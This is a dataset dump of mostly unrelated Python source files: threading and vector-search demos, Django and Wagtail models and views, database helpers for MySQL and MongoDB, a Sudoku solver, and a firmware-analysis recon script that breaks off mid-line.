'tvault-contego.installed')\n","sub_path":"juju-charms/charm-trilio-data-mover/unit_tests/test_data_mover.py","file_name":"test_data_mover.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"162189489","text":"import time\nfrom threading import Thread\n\ndef myfun():\n\ttime.sleep(1)\n\ta = 1 + 1\n\tprint(a)\n\nt1 = time.time()\nfor i in range(5):\n\tmyfun()\n\nt2 = time.time()\nprint(t2-t1)\n\nths = []\nfor _ in range(5):\n\tth = Thread(target=myfun)\n\tth.start()\n\tths.append(th)\n\nfor th in ths:\n\tth.join()\n\nt3 = time.time()\nprint(t3-t2)","sub_path":"Repo_Python/zhihu_interest/multithread/multithr01.py","file_name":"multithr01.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"222391107","text":"from annoy import AnnoyIndex\nimport random\nimport numpy as np\n\n\ndef annoyTest():\n f = 40\n\n t = AnnoyIndex(f,'angular')\n for i in range(1000):\n v = [random.gauss(0,1) for z in range(f)]\n t.add_item(i,v) # add 40-demensional vector\n t.build(10)\n t.save('test.ann')\n\n u = AnnoyIndex(f,'angular')\n u.load('test.ann',True)\n list = u.get_nns_by_item(100,10) # get 10 nearest vectors to index 100\n print(list)\n print(u.get_distance(100,list[0]))\n\ndef faissTest():\n d = 64\n nb = 100\n nq = 10\n np.random.seed(1234)\n xb = np.random.random((nb,d)).astype('float32')\n\n print(xb[:2])\n print(xb.shape)\n print(xb[0:2])\n\nif __name__ == \"__main__\":\n faissTest()\n","sub_path":"basePython/25_ann_search.py","file_name":"25_ann_search.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"588789571","text":"from django.urls import path\n\nfrom wedding_list.views import (\n WeddingListCAPIView,\n WeddingListRUDAPIView,\n ProductAPIView,\n UserAPIView,\n UserDetailView,\n ProductRUDAPIView,\n)\n\nurlpatterns = [\n path(\"users/\", UserAPIView.as_view(), name=\"user_list\"),\n path(\"users//\", UserDetailView.as_view(), name=\"user_detail\"),\n path(\"products/\", ProductAPIView.as_view(), name=\"product_list\"),\n path(\"product//\", ProductRUDAPIView.as_view(), name=\"product_detail\"),\n path(\"list/\", WeddingListCAPIView.as_view(), name=\"wedding_list\"),\n path(\"listitem//\", WeddingListRUDAPIView.as_view(), name=\"wedding_item\"),\n]\n","sub_path":"weddingshop/wedding_list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"324305358","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_20newsgroups\n\ncategories = ['comp.graphics','comp.os.ms-windows.misc', 'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware', 'rec.autos', 'rec.motorcycles', 'rec.sport.baseball', 'rec.sport.hockey']\n\ntwenty_train = fetch_20newsgroups(subset='train', categories=categories, shuffle=True, random_state=42)\ntwenty_test = fetch_20newsgroups(subset='test', categories=categories, shuffle=True, random_state=42)\n\n#----------------------------------Generating Histogram of Number of Documents per Class for the 8 Classes--------------------------------------------\nindex = np.arange(8)\nvalues = []\nfor i in range(len(twenty_train.target_names)):\n values.append((twenty_train.target == i).sum())\n\n\nbar_width = 0.75\ncolor = ['b', 'g', 'r', 'c', 'pink', 'm', 'y', 'k']\nbars = plt.barh(index, values, bar_width,alpha = 0.8, color = color, align=\"edge\")\nplt.xlabel('Number of Documents', fontweight=\"bold\", )\nplt.ylabel('Classes', fontweight=\"bold\")\nplt.title('Number of Training Documents Per Class', fontweight=\"bold\")\nplt.yticks(index + bar_width/2, ('comp.graphics', 'comp.os.ms-windows.misc', 'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware', 'rec.autos', 'rec.motorcycles', 'rec.sport.baseball', 'rec.sport.hockey'))\nplt.show()\n\n#---------------------------------------------------------------------------------------------------------------------------------------------------","sub_path":"project 1/myProject_1/project_1_PartA.py","file_name":"project_1_PartA.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"63246705","text":"from django.db import models\nfrom datetime import datetime\nfrom django.contrib.auth.models import User\n\nfrom django.db.models.fields import DateTimeField\n\nclass Receita(models.Model):\n pessoa=models.ForeignKey(User, on_delete=models.CASCADE)\n nome_receita=models.CharField(max_length=200)\n ingredientes=models.TextField(default='')\n modo_preparo= models.TextField(default='')\n tempo_preparo=models.IntegerField(default=0)\n rendimento=models.CharField(max_length=100)\n categoria=models.CharField(max_length=100)\n date_receita=models.DateTimeField(default=datetime.now, blank=True)\n foto_receita=models.ImageField(upload_to='fotos/%d/%m/%Y',blank=True, null=True, default='0')\n publicada=models.BooleanField(default=False )\n def __str__(self):\n return self.nome_receita\n\n","sub_path":"AlexReceitas/apps/Receitas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"277243862","text":"n = int(input())\n\nif n <= 2:\n print('Deficient')\n exit()\n\ndiv_sum = 0\nfor i in range(1, int(n**0.5)+1):\n if i*i > n: break\n if n%i == 0:\n div_sum += i\n if i*i != n and i != 1:\n div_sum += n//i\n\nif div_sum < n:\n print('Deficient')\nelif div_sum == n:\n print('Perfect')\nelse:\n print('Abundant')","sub_path":"2_kakomon/arc/arc026_b.py","file_name":"arc026_b.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"457409390","text":"# -*- coding:utf-8 -*-\n__author__ = 'snake'\n\nimport datetime\nimport pymysql.cursors\nfrom config import DBConfig\n\n\ndef query(sql=\"\"):\n \"\"\"\n 根据sql查询结果\n args: sql\n return: results 返回结果[{'articleId': 2, 'status': 1, 'createDate': '2018-03-30 11:22:50', 'userId': -1, 'id': 4, 'updateDate': None}]\n \"\"\"\n results = []\n db = pymysql.connect(**DBConfig)\n cur = db.cursor()\n try:\n cur.execute(sql) # 执行sql语句\n # 获得列名\n descs = []\n for desc in cur.description:\n descs.append(desc[0])\n\n # 构造键值对{\"列名\":数据}\n results = []\n for res in _decode_result_date(cur.fetchall()):\n row = {}\n for i in range(len(descs)):\n row[descs[i]] = res[i]\n results.append(row)\n except Exception as e:\n raise e\n finally:\n cur.close()\n db.close() # 关闭连接\n return results\n\n\ndef excute(sql=\"\"):\n \"\"\"\n 根据sql插入或更新数据\n args: sql\n return: is_success,1:成功 0失败\n \"\"\"\n is_success = True\n db = pymysql.connect(**DBConfig)\n cur = db.cursor()\n try:\n cur.execute(sql)\n db.commit()\n except Exception as e:\n db.rollback()\n is_success = False\n finally:\n cur.close()\n db.close()\n return is_success\n\n\ndef excutemany(sqls=[]):\n \"\"\"\n 执行多条插入或更新语句,级联提交时可使用此方法\n args: [sql1, sql2,...]\n return: is_success,1:成功 0失败\n \"\"\"\n is_success = True\n db = pymysql.connect(**DBConfig)\n cur = db.cursor()\n try:\n for sql in sqls:\n cur.execute(sql)\n db.commit()\n except Exception as e:\n db.rollback()\n is_success = False\n finally:\n cur.close()\n db.close()\n return is_success\n\n\ndef _decode_result_date(datas):\n \"\"\"\n 将数据库查询的数据进行时间格式化\n :param datas: (()), 从数据库查询的数据\n :return: [[]] 返回list列表\n \"\"\"\n results = []\n for data in datas:\n tmp_list = []\n for item in data:\n if isinstance(item, datetime.datetime):\n tmp_list.append(item.strftime('%Y-%m-%d %H:%M:%S'))\n else:\n tmp_list.append(item)\n results.append(tmp_list)\n\n return results\n\n\nif __name__ == \"__main__\":\n data = query(\"select * from tbl_user where username='1' and password='1'\")\n print(data)\n\n # 测试单条insert\n # name = \"test4\"\n # sql = \"insert into tbl_test values(NULL,'%s')\" % name\n # flag = excute(sql)\n # print(flag)\n #\n # 测试单条update\n # name = \"update test\"\n # sql = \"update tbl_test set name='%s' where id=2\" % name\n # flag = excute(sql)\n # print(flag)\n\n # 测试多条update\n # name = \"update test\"\n # sql1 =\"update tbl_test set name='%s' where id=2\" % name\n # sql2 =\"update tbl_test set name='%s' where id=3\" % name\n # print(excute_many([sql1, sql2]))\n\n # 测试多条insert\n # name = \"insert test\"\n # sql1 = \"insert into tbl_test values(NULL,'%s')\" % name\n # sql2 = \"insert into tbl_test values(NULL,'%s')\" % name\n # print(excutemany([sql1, sql2]))\n","sub_path":"app/utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"283632965","text":"from django.shortcuts import render\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nimport json\nfrom models import User\nfrom django.http import HttpResponse\nfrom django.forms.models import model_to_dict\nfrom django.views.decorators.csrf import csrf_exempt\nfrom serializers import UserSerializer\n# Create your views here.\n@csrf_exempt\n@api_view(['GET', 'POST', 'PUT'])\ndef user_list(request):\n if request.method =='GET':\n users = User.objects.all()\n serializer=UserSerializer(users, many=True)\n content = JSONRenderer().render(serializer.data)\n return HttpResponse(json.dumps(content), content_type='application/json')\n elif request.method =='POST':\n serializer = UserSerializer(data=request.data)\n if serializer.is_valid():\n serializer.validated_data\n serializer.save()\n content = JSONRenderer().render(serializer.data)\n return HttpResponse(json.dumps(content), content_type='application/json')\n return HttpResponse(serializer.errors)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef user_changes(request, cwid):\n try:\n user = User.objects.get(cwid=cwid)\n except User.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n if request.method =='GET':\n serializer = UserSerializer(user)\n content = JSONRenderer().render(serializer.data)\n return HttpResponse(json.dumps(content), content_type='application/json')\n elif request.method =='PUT':\n serializer = UserSerializer(user, data=request.data)\n if serializer.is_valid():\n serializer.save()\n content = JSONRenderer().render(serializer.data)\n return HttpResponse(json.dumps(content), content_type='application/json')\n return HttpResponse(serializer.errors)\n \n ","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"115132851","text":"from django.urls import path\nfrom FB_CRUD import views\n\nurlpatterns = [\n path('', views.add_show, name='addandshow'),\n\n #For Deleting the data.This one is known as dynamic url.\n path('delete//', views.delete, name = 'delete'),\n\n path('/', views.edit, name = 'edit')\n\n \n]","sub_path":"04.FunctionBased_CRUD/FunctionBased_CRUD/FB_CRUD/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"585244817","text":"#edited:180519\n#coding:utf-8\n\nimport pymongo\n\nclass mongodb(object):\n\t\"\"\"usual handle of mongodb\"\"\"\n\tdef __init__(self,uri='mongodb://localhost:27017/test',dbname='test'):\n\t\t#self.uri = 'mongodb://localhost:27017/test'\n\t\tself.conn = pymongo.MongoClient(uri)\n\t\tself.db = self.conn[dbname]\n\t\n\tdef __connect(self,dbname,collection):\n\t\ttry:\n\t\t\tconn = pymongo.MongoClient(self.uri)\n\t\t\tdb = conn[dbname]\n\t\t\tcol = db[collection]\n\t\texcept Exception as e:\n\t\t\traise e\n\t\treturn col\n\n\t#@staticmethod\n\tdef find_many(self,filter,projection=None):\n\t\tcol = self.__connect('test','test')\n\t\tresult = [x for x in col.find(filter,projection)]\n\t\tprint(dir(result))\n\t\tprint('查询后返回:{}\\n'.format(result))\n\t\treturn result\n\n\tdef insert_one(self, collection, doc):\n\t\ttry:\n\t\t\tcol = self.db[collection]\n\t\t\tresult = col.insert_one(doc)\n\t\t\tprint('插入成功:{0}\\n生成的id:{1}\\n'.format(result.acknowledged,result.inserted_id))\n\t\texcept Exception as e:\n\t\t\traise e\n\t\treturn result\n\n\tdef insert_many(self,docs,filter):\n\t\ttry:\n\t\t\tcol = self.__connect('test','test')\n\t\t\tresult = col.insert_many(docs)\n\t\t\tprint('插入成功:{0}\\n生成ids:{1}\\n'.format(result.acknowledged,result.inserted_ids))\n\t\texcept Exception as e:\n\t\t\traise e\t\n\t\treturn result\n\n\tdef del_many(self,filter,query):\n\t\ttry:\n\t\t\tcol = self.__connect('test','test')\n\t\t\tresult = col.delete_many(filter)\n\t\t\tprint('删除成功:{0}\\n删除数目:{1}\\n'.format(result.acknowledged,result.deleted_count))\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef drop_col(self,collection):\n\t\t\"\"\"删除某个集合\"\"\"\n\t\tcol = self.db[collection]\n\t\tcol.drop()\n\n\tdef close(self):\n\t\treturn self.conn.close()\n\nif __name__ == '__main__':\n\tm = mongodb()\n\tdoc = {'name':'小米','phone':'13800001000','sex':'male','age':17}\n\tdocs = [{'name':'小黑','phone':'13800001001','sex':'male','age':18},{'name':'小陈','phone':'13800001002','sex':'female','age':15},\n\t\t\t{'name':'小刘','phone':'13800001002','sex':'female','age':14},{'name':'小王','phone':'13800001002','sex':'male','age':16}]\n\tm.insert_one('test',doc)\n\t#m.insert_many(docs,{'name':'小黑'})\n\t#m.find_many(filter={},projection={'_id':False})\n\t#m.del_many({'sex':'male'},{'sex':'female'})\n\t# 清空 test 集合\n\tm.drop_col('test')\n\tm.close()","sub_path":"Mongo/handle.py","file_name":"handle.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"161454216","text":"import datetime\n\nfrom django.db import models\nfrom django import forms\n\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import RichTextField, StreamField\nfrom wagtail.core import blocks\nfrom wagtail.admin.edit_handlers import FieldPanel, MultiFieldPanel, InlinePanel, StreamFieldPanel, FieldRowPanel\nfrom wagtail.snippets.models import register_snippet\nfrom wagtail.search import index\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom taggit.models import TaggedItemBase\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\n# Create your models here.\n\n\n@register_snippet\nclass AnimeStudio(models.Model):\n name = models.CharField(max_length=255)\n slug = models.CharField(max_length=255,null=True, blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image', null=True, blank=True,\n on_delete=models.SET_NULL, related_name='+'\n )\n\n panels = [\n FieldPanel('name'),\n FieldPanel('slug'),\n ImageChooserPanel('image'),\n ]\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = 'Studios'\n\n\nclass AnimePageTag(TaggedItemBase):\n content_object = ParentalKey(\n 'AnimePage',\n related_name='tagged_items',\n null=True, blank=True,\n on_delete=models.SET_NULL\n )\n\n def __str__(self):\n return self.name\n\n\n\nclass AnimeIndexPage(Page):\n intro = models.CharField(max_length=300)\n layout = models.CharField(max_length=300, default=\"grid-4-cols\")\n featured_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n content_panels = Page.content_panels + [\n FieldPanel('intro'),\n FieldPanel('layout'),\n ImageChooserPanel('featured_image')\n ]\n\nclass AnimePage(Page):\n\n # Database fields\n intro = models.CharField(max_length=450, null=True, blank=True)\n body = StreamField(\n [\n ('heading', blocks.CharBlock(classname=\"full title\")),\n ('paragraph', blocks.RichTextBlock()),\n ('image', ImageChooserBlock())\n ],\n default=\"\" \n )\n \n studio = models.ForeignKey('anime.AnimeStudio',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='studio')\n \n format = models.CharField(\n max_length=20,\n choices=[\n ('tv-series', 'TV Series'),\n ('ova', 'OVA'),\n ('movie', 'MOVIE'),\n ],\n default='tv-series',\n )\n\n season = models.CharField(\n max_length=6,\n choices=[\n ('spring', 'Spring'),\n ('summer', 'Summer'),\n ('autumn', 'Autumn'),\n ('winter''', 'Winter'), \n ],\n default='spring',\n )\n now = datetime.datetime.now()\n year = models.IntegerField(validators=[MinValueValidator(1950),MaxValueValidator(2050)], default = now.year)\n tags = ClusterTaggableManager(through=AnimePageTag, blank=True)\n # categories = ParentalManyToManyField('project.ProjectPageCategory', blank=True)\n featured_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n # Editor panels configuration\n\n content_panels = Page.content_panels + [\n FieldPanel('intro'),\n StreamFieldPanel('body'),\n MultiFieldPanel([\n FieldPanel('tags'),\n # FieldPanel('categories', widget=forms.CheckboxSelectMultiple),\n ], heading=\"Meta Info\"),\n FieldRowPanel([\n FieldPanel('studio', classname=\"col3\"),\n FieldPanel('format', classname=\"col3\"),\n FieldPanel('season', classname=\"col3\"),\n FieldPanel('year', classname=\"col3\"),\n ]),\n ImageChooserPanel('featured_image'),\n\n ]\n # Parent page / subpage type rules\n\n parent_page_types = ['anime.AnimeIndexPage']","sub_path":"anime/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179200767","text":"#!/usr/bin/env python2\nfrom __future__ import print_function\nimport sys\nimport copy\nimport timeit\n\n\nclass SudokuSolver:\n def __init__(self, board=None):\n if board:\n self.board = copy.deepcopy(board)\n else:\n self.board = [[\".\"] * 9 for _ in range(9)]\n self.result = []\n self._in_row, self._in_col, self._in_block = None, None, None\n self._BLANK = None\n self._ONES = None\n self._entry = None\n self._row, self._col, self._block = None, None, None\n self._seq_ptr = None\n self._sequence = None\n self._count = None\n self._level_count = None\n self._row_vals, self._col_vals, self._block_vals = None, None, None\n self._vals = None\n\n def init_sudoku2(self):\n self._in_row = [square / 9 for square in range(81)]\n self._in_col = [square % 9 for square in range(81)]\n self._in_block = [square / 27 * 3 + square % 9 / 3 for square in range(81)]\n self._BLANK = 0\n self._ONES = 0x3fe # binary 1111111110\n self._entry = [self._BLANK] * 81 # records entries 1-9 in the grid, as the corresponding bit set to 1\n self._row, self._col, self._block = [self._ONES] * 9, [self._ONES] * 9, [\n self._ONES] * 9 # each int is a 9-bit array\n self._seq_ptr = 0\n self._sequence = [square for square in range(81)]\n self._count = 0\n self._level_count = [0] * 81\n\n def init_entry(self, row, col, val):\n square = 9 * row + col\n valbit = 1 << val\n # add suitable checks for data consistency\n self._entry[square] = valbit\n self._row[self._in_row[square]] &= ~ valbit # simpler self._row[row] &= ~ valbit;\n self._col[self._in_col[square]] &= ~ valbit # simpler self._col[col] &= ~ valbit;\n self._block[self._in_block[square]] &= ~ valbit\n seq_ptr2 = self._seq_ptr\n while seq_ptr2 < 81 and self._sequence[seq_ptr2] != square:\n seq_ptr2 += 1\n self._sequence[self._seq_ptr], self._sequence[seq_ptr2] = self._sequence[seq_ptr2], self._sequence[self._seq_ptr]\n self._seq_ptr += 1\n\n def print_array(self):\n square = 0\n for row in range(9):\n if row % 3 == 0:\n sys.stdout.write(\"\\n\")\n for col in range(9):\n if col % 3 == 0:\n sys.stdout.write(\" \")\n valbit = self._entry[square]\n square += 1\n if valbit != 0:\n for val in range(1, 10):\n if valbit == 1 << val:\n ch = str(val)\n break\n else:\n ch = \".\"\n sys.stdout.write(ch)\n sys.stdout.write(\"\\n\")\n\n def console_input_one(self):\n for row in range(9):\n for col in range(9):\n sys.stdout.write(\"Row[{:d}]Col[{:d}]:\".format(row + 1, col + 1))\n input_string = raw_input()\n while len(input_string) != 1:\n sys.stdout.write(\"Row[{:d}]Col[{:d}]:\".format(row + 1, col + 1))\n input_string = raw_input()\n ch = input_string\n if ch.isdigit(): # 48 < ord(ch) < 58\n self.init_entry(row, col, int(ch))\n self.print_array()\n\n def console_input_row(self):\n for row in range(9):\n sys.stdout.write(\"Row[{%d}]:\" % (row + 1))\n input_string = raw_input()\n while len(input_string) != 9:\n sys.stdout.write(\"Row[{%d}]:\" % (row + 1))\n input_string = raw_input()\n for col in range(9):\n ch = input_string[col]\n if ch.isdigit():\n self.init_entry(row, col, int(ch))\n self.print_array()\n\n def _print_stats(self):\n sys.stdout.write(\"\\nLevel Counts:\\n\")\n square = 0\n while self._level_count[square] == 0:\n square += 1\n level = 0\n while square < 81:\n seq = self._sequence[square]\n sys.stdout.write(\"({},{}):{} \".format(seq / 9 + 1, seq % 9 + 1, self._level_count[square]))\n level += 1\n if level % 5 == 0:\n sys.stdout.write(\"\\n\")\n square += 1\n if level % 5 != 0:\n sys.stdout.write(\"\\n\")\n sys.stdout.write(\"\\nCount = %d\\n\" % self._count)\n\n def _next_seq(self, seq_ptr):\n min_bit_count = 100\n for ptr in range(seq_ptr, 81):\n square = self._sequence[ptr]\n possibles = self._block[self._in_block[square]] & self._row[self._in_row[square]] & self._col[self._in_col[square]]\n bit_count = 0\n while possibles:\n possibles &= ~ (possibles & - possibles)\n bit_count += 1\n if bit_count < min_bit_count:\n min_bit_count = bit_count\n seq_ptr2 = ptr\n return seq_ptr2\n\n def _place(self, seq_ptr):\n if seq_ptr >= 81:\n self.print_array()\n self._print_stats()\n self.entry_to_board()\n self.result.append(copy.deepcopy(self.board))\n return\n self._level_count[seq_ptr] += 1\n self._count += 1\n seq_ptr2 = self._next_seq(seq_ptr)\n self._sequence[seq_ptr], self._sequence[seq_ptr2] = self._sequence[seq_ptr2], self._sequence[seq_ptr]\n square = self._sequence[seq_ptr]\n row_index = self._in_row[square]\n col_index = self._in_col[square]\n block_index = self._in_block[square]\n possibles = self._block[block_index] & self._row[row_index] & self._col[col_index]\n while possibles:\n valbit = possibles & - possibles # lowest 1 bit in possibles\n possibles &= ~ valbit\n self._entry[square] = valbit\n self._row[row_index] &= ~ valbit\n self._col[col_index] &= ~ valbit\n self._block[block_index] &= ~ valbit\n self._place(seq_ptr + 1)\n self._entry[square] = self._BLANK # could be moved out of the loop\n self._row[row_index] |= valbit\n self._col[col_index] |= valbit\n self._block[block_index] |= valbit\n self._sequence[seq_ptr], self._sequence[seq_ptr2] = self._sequence[seq_ptr2], self._sequence[seq_ptr]\n\n def sudoku2(self, console=True):\n if console:\n self.init_sudoku2()\n self.console_input_row()\n self.entry_to_board()\n temp = copy.deepcopy(self.board)\n self._place(self._seq_ptr)\n sys.stdout.write(\"\\nTotal Count = %d\\n\" % self._count)\n self.board = temp\n\n def entry_to_board(self):\n for square in range(81):\n valbit = self._entry[square]\n if valbit != 0:\n for val in range(1, 10):\n if valbit == 1 << val:\n self.board[square / 9][square % 9] = str(val)\n else:\n self.board[square / 9][square % 9] = \".\"\n\n def board_to_entry(self):\n self.init_sudoku2()\n for row in range(9):\n for col in range(9):\n if self.board[row][col].isdigit():\n self.init_entry(row, col, int(self.board[row][col]))\n\n def is_valid_sudoku(self):\n used_row = [[0] * 9 for _ in range(9)]\n used_col = [[0] * 9 for _ in range(9)]\n used_blk = [[0] * 9 for _ in range(9)]\n for row in range(9):\n for col in range(9):\n if self.board[row][col].isdigit():\n num = int(self.board[row][col]) - 1\n block = row / 3 * 3 + col / 3\n if used_row[row][num] or used_col[col][num] or used_blk[block][num]:\n return False\n used_row[row][num] = used_col[col][num] = used_blk[block][num] = 1\n return True\n\n def is_valid_num(self, row, col, num):\n blk_row = row / 3 * 3\n blk_col = col / 3 * 3\n for i in range(9):\n if self.board[i][col] == num or self.board[row][i] == num or self.board[blk_row + i / 3][blk_col + i % 3] == num:\n return False\n return True\n\n def _validation(self, row, col, num):\n if self._row_vals[row][num - 1] == 1 or self._col_vals[col][num - 1] == 1 or self._block_vals[row / 3 * 3 + col / 3][num - 1] == 1:\n return False\n return True\n\n def _backtracking(self, row=0, col=0):\n if self.board[row][col].isdigit():\n if col + 1 != 9:\n self._backtracking(row, col + 1)\n elif row + 1 != 9:\n self._backtracking(row + 1, 0)\n else:\n self.result.append(copy.deepcopy(self.board))\n else:\n for num in range(1, 10):\n if self._validation(row, col, num):\n self.board[row][col] = str(num)\n self._row_vals[row][num - 1] = self._col_vals[col][num - 1] = self._block_vals[row / 3 * 3 + col / 3][num - 1] = 1\n if col + 1 != 9:\n self._backtracking(row, col + 1)\n elif row + 1 != 9:\n self._backtracking(row + 1, 0)\n else:\n self.result.append(copy.deepcopy(self.board))\n self._row_vals[row][num - 1] = self._col_vals[col][num - 1] = self._block_vals[row / 3 * 3 + col / 3][num - 1] = 0\n self.board[row][col] = \".\"\n\n def rookie(self):\n self._row_vals = [[0] * 9 for _ in range(9)]\n self._col_vals = [[0] * 9 for _ in range(9)]\n self._block_vals = [[0] * 9 for _ in range(9)]\n for row in range(9):\n for col in range(9):\n if self.board[row][col].isdigit():\n index = int(self.board[row][col]) - 1\n self._row_vals[row][index] = self._col_vals[col][index] = self._block_vals[row / 3 * 3 + col / 3][index] = 1\n self._backtracking()\n\n def _recovery(self, pos, update):\n self.board[pos[0]][pos[1]] = \".\"\n for key in update:\n if key in self._vals:\n self._vals[key].append(update[key])\n else:\n self._vals[key] = update[key]\n return None\n\n def _validation2(self, pos, num, update):\n self.board[pos[0]][pos[1]] = num\n del self._vals[pos]\n for key in self._vals:\n if num in self._vals[key]:\n if key[0] == pos[0] or key[1] == pos[1] or key[0] / 3 * 3 + key[1] / 3 == pos[0] / 3 * 3 + pos[1] / 3:\n update[key] = num\n self._vals[key].remove(num)\n if len(self._vals[key]) == 0:\n return False\n return True\n\n def _backtracking2(self):\n if len(self._vals) == 0:\n self.result.append(copy.deepcopy(self.board))\n else:\n pos = min(self._vals.keys(), key=lambda x: len(self._vals[x]))\n nums = self._vals[pos]\n for num in nums:\n update = {pos: self._vals[pos]}\n if self._validation2(pos, num, update):\n self._backtracking2()\n self._recovery(pos, update)\n\n def rookie2(self):\n nums = \"123456789\"\n used_vals, self._vals = {}, {}\n for row in range(9):\n for col in range(9):\n if self.board[row][col].isdigit():\n if (\"r\", row) in used_vals:\n used_vals[(\"r\", row)].append(self.board[row][col])\n else:\n used_vals[(\"r\", row)] = [self.board[row][col]]\n if (\"c\", col) in used_vals:\n used_vals[(\"c\", col)].append(self.board[row][col])\n else:\n used_vals[(\"c\", col)] = [self.board[row][col]]\n block = row / 3 * 3 + col / 3\n if (\"b\", block) in used_vals:\n used_vals[(\"b\", block)].append(self.board[row][col])\n else:\n used_vals[(\"b\", block)] = [self.board[row][col]]\n else:\n self._vals[(row, col)] = []\n for row, col in self._vals:\n self._vals[(row, col)] = [num for num in nums\n if num not in used_vals.get((\"r\", row), [])\n and num not in used_vals.get((\"c\", col), [])\n and num not in used_vals.get((\"b\", row / 3 * 3 + col / 3), [])]\n self._backtracking2()\n\n\nif __name__ == \"__main__\":\n sudoku = [[\".\", \"2\", \"1\", \"6\", \".\", \"7\", \"8\", \"4\", \".\"],\n [\"7\", \".\", \".\", \".\", \"1\", \".\", \".\", \".\", \"3\"],\n [\"9\", \".\", \".\", \".\", \".\", \".\", \".\", \".\", \"2\"],\n [\"3\", \".\", \".\", \".\", \".\", \".\", \".\", \".\", \"8\"],\n [\"2\", \".\", \".\", \".\", \".\", \".\", \".\", \".\", \"7\"],\n [\".\", \"9\", \".\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\".\", \".\", \"4\", \".\", \".\", \".\", \"7\", \".\", \".\"],\n [\".\", \".\", \".\", \"2\", \".\", \"1\", \".\", \".\", \".\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \".\", \".\"]]\n start_time = timeit.default_timer()\n solver = SudokuSolver(sudoku)\n solver.board_to_entry()\n solver.sudoku2(False)\n finish_time = timeit.default_timer()\n print(finish_time - start_time)\n","sub_path":"sudoku_solver.py","file_name":"sudoku_solver.py","file_ext":"py","file_size_in_byte":13467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"607278392","text":"from modules.helperFunctions import getProgramInformationsFromJson\nfrom modules.requestFunctions import (getMetaData, getCryptoMaterialSummary, getMaterials, getHid,\n getSoftwareComponentsSummary, getFileTypeSummary,\n getIncludedFiles, getUnpacked)\nfrom modules.db import setupDB\nfrom modules.searchWhitelist import searchWithWhitelist\nfrom modules.findConfigs import findImportantConfigs, findConfigs\nfrom requests import get\nfrom modules.db import createTable, getProgramInformations, checkDB, insertInTable\n\n\ndef createReconJSON(tree, uid):\n json = {}\n db = setupDB(uid)\n json['meta_data'] = createMetaData(tree)\n json['crypto_material'] = createCryptoMaterial(tree)\n json['software_components'] = createSoftwareComponents(tree, uid, db)\n\n included_files = findIncludedFiles(tree)\n\n json['whitelist'] = searchWithWhitelist(included_files, db)\n\n configs = findConfigs(included_files, db)['configs']\n json['important_configs'] = createImportantConfigs(json['whitelist'], configs)\n remaining_configs = deleteDoubleConfigs(configs, json['important_configs'])\n\n json['remaining_configs'] = remaining_configs\n return json\n\n\ndef createMetaData(tree):\n return {'device_name': getMetaData(tree, \"device_name\"),\n 'vendor': getMetaData(tree, \"vendor\"),\n 'device_class': getMetaData(tree, \"device_class\"),\n 'release_date': getMetaData(tree, \"release_date\"),\n 'version': getMetaData(tree, \"version\")}\n\n\ndef createCryptoMaterial(tree):\n json = {}\n for key in getCryptoMaterialSummary(tree):\n uids = [uid for uid in tree['firmware']['analysis']['crypto_material']['summary'][key]]\n programs = []\n for uid in uids:\n uid_tree = get('http://localhost:5000/rest/file_object/' + uid).json()\n materials = getMaterials(uid_tree, key)\n programs.append({'name': getHid(uid_tree).split(\"/\")[-1], 'uid': uid,\n 